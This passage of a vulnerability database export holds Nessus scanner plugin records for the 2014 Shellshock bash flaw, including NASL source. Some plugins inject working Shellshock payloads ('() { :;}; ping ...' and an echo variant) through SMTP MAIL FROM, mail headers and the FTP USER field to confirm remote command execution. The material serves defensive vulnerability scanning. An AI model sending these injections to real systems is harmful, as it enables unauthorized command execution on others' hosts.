# Discard banner\n ftp_debug(str:\"custom banner\");\n ftp_recv_line(socket:soc);\n\n return soc;\n}\n\n# Attempt to get the service to echo something back to us, if the\n# 'ExecOptions sendStdout' option is set.\n\necho_injection = '() { :;}; echo \"NESSUS-e07ad3ba-$((17 + 12))-59f8d00f4bdf\"';\necho_response = 'NESSUS-e07ad3ba-29-59f8d00f4bdf';\n\nsocket = ftp_open(port:port);\n\nsend(socket:socket, data:\"USER \" + echo_injection + '\\r\\n');\nres = recv(socket:socket, length:2000, min:2000, timeout:60);\n\nftp_close(socket:socket);\n\nif (echo_response >< res)\n{\n report = NULL;\n if (report_verbosity > 0)\n {\n report =\n '\\n' + 'Nessus was able to determine that the remote host is vulnerable to the ' +\n '\\n' + 'Shellshock vulnerability by evaluating a simple math equation, injected ' +\n '\\n' + 'through the ProFTPD service on port ' + port + '. The service allowed injection ' +\n '\\n' + \"via the '%U' mod_exec 'cookie'.\" +\n '\\n';\n }\n security_hole(port:port, extra:report);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"FTP server\", port);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:56:31", "description": "SunOS 5.10: bash patch. \n\nDate this patch was last updated by Oracle : Sep/26/14", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Solaris 10 (sparc) : 126546-06", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS10_126546-06.NASL", "href": "https://www.tenable.com/plugins/nessus/77913", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77913);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Solaris 10 (sparc) : 126546-06\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing Oracle Security Patch number 126546-06\");\n script_set_attribute(attribute:\"description\", value:\n\"SunOS 5.10: bash patch. \n\nDate this patch was last updated by Oracle : Sep/26/14\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/2014/09/cve-2014-6271/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.oracle.com/patch/entry/solaris_idrs_available_on_mos\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/126546-06\");\n script_set_attribute(attribute:\"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Solaris Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\", \"Host/Solaris/pkginfo\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Solaris/showrev\")) audit(AUDIT_OS_NOT, \"Solaris 10 or earlier\");\nif (!get_kb_item(\"Host/Solaris/pkginfo\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"126546-06\", obsoleted_by:\"\", package:\"SUNWbash\", version:\"11.10.0,REV=2005.01.08.05.16\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"126546-06\", obsoleted_by:\"\", package:\"SUNWbashS\", version:\"11.10.0,REV=2005.01.08.05.16\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:56:15", "description": "The remote host appears to be running Qmail. A remote attacker can exploit Qmail to execute commands via a specially crafted MAIL FROM header if the remote host has a vulnerable version of Bash. This is due to the fact that Qmail does not properly sanitize input before setting environmental variables.\n\nA negative result from this plugin does not prove conclusively that the remote system is not affected by Shellshock, only that Qmail could not be used to exploit the Shellshock flaw.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Qmail Remote Command Execution via Shellshock", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:qmail:qmail", "cpe:/a:gnu:bash"], "id": "SHELLSHOCK_QMAIL.NASL", "href": "https://www.tenable.com/plugins/nessus/77970", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77970);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Qmail Remote Command Execution via Shellshock\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote mail server allows remote command execution via Shellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be running Qmail. A remote attacker can\nexploit Qmail to execute commands via a specially crafted MAIL FROM\nheader if the remote host has a vulnerable version of Bash. This is\ndue to the fact that Qmail does not properly sanitize input before\nsetting environmental variables.\n\nA negative result from this plugin does not prove conclusively that\nthe remote system is not affected by Shellshock, only that Qmail could\nnot be used to exploit the Shellshock flaw.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the referenced Bash patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:qmail:qmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"SMTP problems\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smtpserver_detect.nasl\");\n script_require_keys(\"Settings/ThoroughTests\");\n script_require_ports(\"Services/smtp\", 25);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\n\nif (! thorough_tests ) audit(AUDIT_THOROUGH);\n\nport = get_service(svc: \"smtp\", default: 25, exit_on_fail: 1);\n\n# Don't really care if its not qmail\nisqm = get_kb_item(\"SMTP/\"+port+\"/qmail\");\nif(isnull(isqm) || !isqm) audit(AUDIT_NOT_DETECT,\"Qmail\",port);\n\n# Don't bother if we cant open a proper port\nsoc = smtp_open(port:port, helo:this_host_name());\nif (!soc) audit(AUDIT_SVC_FAIL,\"SMTP\",port);\nclose(soc);\n\nusers = make_list(\n \"admin\",\n \"qmail\",\n \"root\",\n \"alias\",\n \"qmail-postmaster\",\n \"qmail-abuse\",\n \"qmail-root\"\n);\ntraitor = NULL;\n\nforeach user (users)\n{\n # Open a connection. Skip to next user if we fail\n soc = smtp_open(port:port, helo:this_host_name());\n if (!soc) continue;\n ptrn = hexstr(rand_str(length:15));\n attk = \"() { :;}; ping -p \"+ptrn+\" -c 3 \"+this_host_name();\n\n send(socket:soc,data:'MAIL FROM: <'+attk+'>\\r\\n');\n s = smtp_recv_line(socket:soc);\n if(!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n {\n close(soc);\n continue; # Next user\n }\n # Has to be a valid user on the system, we try defaults\n send(socket:soc,data:'RCPT TO: <'+user+'@'+get_host_name()+'>\\r\\n');\n s = smtp_recv_line(socket:soc);\n if(!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n {\n close(soc);\n continue; # Next user\n }\n send(socket:soc,data:'DATA\\r\\n');\n s = smtp_recv_line(socket:soc);\n if(!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n {\n close(soc);\n continue; # Next user\n }\n\n # See if we get a response\n filter = string(\"icmp and icmp[0] = 8 and src host \", get_host_ip());\n s = send_capture(socket:soc,data:'Subject:Vuln\\r\\n.\\r\\n',pcap_filter:filter);\n s = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\n close(soc);\n\n # No response, meaning we didn't get in\n if(isnull(s) || ptrn >!< s) continue; # Next user\n\n # We got in, that's good enough\n traitor = user;\n break;\n}\n\n# Couldn't get in\nif(isnull(traitor)) audit(AUDIT_LISTEN_NOT_VULN,\"Qmail\",port);\n\ntraitor = traitor+\"@\"+get_host_name();\nif(report_verbosity > 0)\n{\n report = \"Nessus was able to execute a remote command by sending a message to \"+traitor+'\\n';\n security_hole(port:port,extra:report);\n} else security_hole(port);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:56:33", "description": "SunOS 5.9_x86: bash patch. \n\nDate this patch was last updated by Oracle : Sep/26/14", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Solaris 9 (x86) : 149080-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS9_X86_149080-01.NASL", "href": "https://www.tenable.com/plugins/nessus/77912", "sourceData": "#%NASL_MIN_LEVEL 70300\n# @DEPRECATED@\n#\n# This script has been deprecated by solaris9_x86_149080.nasl.\n#\n# Disabled on 2014/10/13.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77912);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n\n script_name(english:\"Solaris 9 (x86) : 149080-01\");\n script_summary(english:\"Check for patch 149080-01\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is missing Oracle Security Patch number 149080-01\");\n script_set_attribute(attribute:\"description\", value:\n\"SunOS 5.9_x86: bash patch. \n\nDate this patch was last updated by Oracle : Sep/26/14\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/2014/09/cve-2014-6271/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.oracle.com/patch/entry/solaris_idrs_available_on_mos\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/149080-01\");\n script_set_attribute(attribute:\"solution\", value:\"You should install this patch for your system to be up-to-date.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Pure-FTPd External Authentication Bash Environment Variable Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\", \"Host/Solaris/pkginfo\");\n\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"This plugin has been deprecated. Refer to plugin #78113 (solaris9_x86_149080.nasl) instead.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Solaris/showrev\")) audit(AUDIT_OS_NOT, \"Solaris 10 or earlier\");\nif (!get_kb_item(\"Host/Solaris/pkginfo\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"149080-01\", obsoleted_by:\"\", package:\"SUNWbash\", version:\"11.9.0,REV=2002.03.02.00.30\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"149080-01\", obsoleted_by:\"\", package:\"SUNWbashS\", version:\"11.9.0,REV=2002.03.02.00.30\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:56:14", "description": "The remote host appears to be running Postfix. Postfix itself is not vulnerable to Shellshock; however, any bash script Postfix runs for filtering or other tasks could potentially be affected if the script exports an environmental variable from the content or headers of a message.\n\nA negative result from this plugin does not prove conclusively that the remote system is not affected by Shellshock, only that any scripts Postfix may be running do not create the conditions that are exploitable via the Shellshock flaw.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Postfix Script Remote Command Execution via Shellshock", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:postfix:postfix", "cpe:/a:gnu:bash"], "id": "SHELLSHOCK_POSTFIX_FILTERS.NASL", "href": "https://www.tenable.com/plugins/nessus/77969", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77969);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"EDB-ID\", value:\"34896\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Postfix Script Remote Command Execution via Shellshock\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote mail server uses scripts that allow remote command\nexecution via Shellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be running Postfix. Postfix itself is not\nvulnerable to Shellshock; however, any bash script Postfix runs for\nfiltering or other tasks could potentially be affected if the script\nexports an environmental variable from the content or headers of a\nmessage.\n\nA negative result from this plugin does not prove conclusively that\nthe remote system is not affected by Shellshock, only that any scripts\nPostfix may be running do not create the conditions that are\nexploitable via the Shellshock flaw.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the referenced Bash patch or remove the Postfix scripts.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:postfix:postfix\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"SMTP problems\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smtpserver_detect.nasl\");\n script_require_keys(\"Settings/ThoroughTests\");\n script_require_ports(\"Services/smtp\", 25);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\n\nif (! thorough_tests ) audit(AUDIT_THOROUGH);\n\nport = get_service(svc: \"smtp\", default: 25, exit_on_fail: 1);\n\n# Don't really care if its not postfix\nispf = get_kb_item(\"SMTP/\"+port+\"/postfix\");\nif(isnull(ispf) || !ispf) audit(AUDIT_NOT_DETECT,\"Postfix\",port);\n\n# Open a connection.\nsoc = smtp_open(port:port, helo:this_host_name());\nif (!soc) audit(AUDIT_SVC_FAIL,\"SMTP\",port);\n\n# The data headers we want to try this attack on\nheaders = make_list(\n \"To:\",\n \"References:\",\n \"Cc:\",\n \"Bcc:\",\n \"From:\",\n \"Subject:\",\n \"Date:\",\n \"Message-ID:\",\n \"Comments:\",\n \"Keywords:\",\n \"Resent-Date:\",\n \"Resent-From:\",\n \"Resent-Sender:\",\n \"\" # For the actual text of the email\n);\n\n# Build the attack data\nptrn = rand_str(length:10);\ndata = \"\";\nid = 0;\nforeach head (headers)\n{\n hkey = hexstr(mkbyte(id));\n data += head+\"() { :;}; ping -p \"+hkey+hexstr(ptrn)+\" -c 3 \"+this_host_name()+'\\n';\n id += 1;\n}\nptrn = hexstr(ptrn);\n\n# Do the SMTP boogaloo, for postfix FROM/TO have to be valid\nsend(socket:soc,data:'MAIL FROM: <>\\r\\n');\ns = smtp_recv_line(socket:soc);\nif(!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n{\n close(soc);\n audit(AUDIT_SVC_ERR,port);\n}\nsend(socket:soc,data:'RCPT TO: <nobody>\\r\\n');\ns = smtp_recv_line(socket:soc);\nif(!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n{\n close(soc);\n audit(AUDIT_SVC_ERR,port);\n}\nsend(socket:soc,data:'DATA\\r\\n');\ns = smtp_recv_line(socket:soc);\nif(!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n{\n close(soc);\n audit(AUDIT_SVC_ERR,port);\n}\n\n# See if we get a response\nfilter = string(\"icmp and icmp[0] = 8 and src host \", get_host_ip());\ns = send_capture(socket:soc,data:data+'\\r\\n.\\r\\n',pcap_filter:filter);\ns = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\nclose(soc);\n\n# No response, meaning we didn't get in\nif(isnull(s) || ptrn >!< s) audit(AUDIT_LISTEN_NOT_VULN,\"Postfix\",port);\n\n# Figure out what let us in\nhkey = eregmatch(pattern:\"(\\d\\d)\"+ptrn,string:s);\n\n# Should never happen\nif(empty_or_null(hkey)) exit(1,\"Could not match pattern to response.\");\n\nhkey = int(getbyte(blob:hex2raw(s:hkey[1]),pos:0));\n\n# Should never happen\nif(hkey > max_index(headers)) exit(1, \"Strange header key in response.\");\n\nheader = headers[hkey];\nif(header == \"\")\n header = \"text contents\";\nelse\n header = \"'\"+str_replace(string:header, find:\":\", replace:\"\")+\"' header\";\n\nif(report_verbosity > 0)\n{\n report = 'The '+tolower(header)+' of the message was used to execute a remote command.';\n security_hole(port:port,extra:report);\n} else security_hole(port);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:55:42", "description": "It was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables need to be made aware of changes to the way names are handled by this update.\n\nNote: Docker users are advised to use 'yum update' within their containers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to https://securityblog.redhat.com/2014/09/24/bash-specially crafted-environment-variables-code-injection-attack/", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : bash on SL5.x, SL6.x i386/x86_64 (20140926) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:bash", "p-cpe:/a:fermilab:scientific_linux:bash-debuginfo", "p-cpe:/a:fermilab:scientific_linux:bash-doc", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20140926_BASH_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/77956", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77956);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Scientific Linux Security Update : bash on SL5.x, SL6.x i386/x86_64 (20140926) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"It was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment\nvariables need to be made aware of changes to the way names are\nhandled by this update.\n\nNote: Docker users are advised to use 'yum update' within their\ncontainers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer\nto https://securityblog.redhat.com/2014/09/24/bash-specially\ncrafted-environment-variables-code-injection-attack/\");\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1409&L=scientific-linux-errata&T=0&P=1987\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f7d56c5e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash, bash-debuginfo and / or bash-doc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", 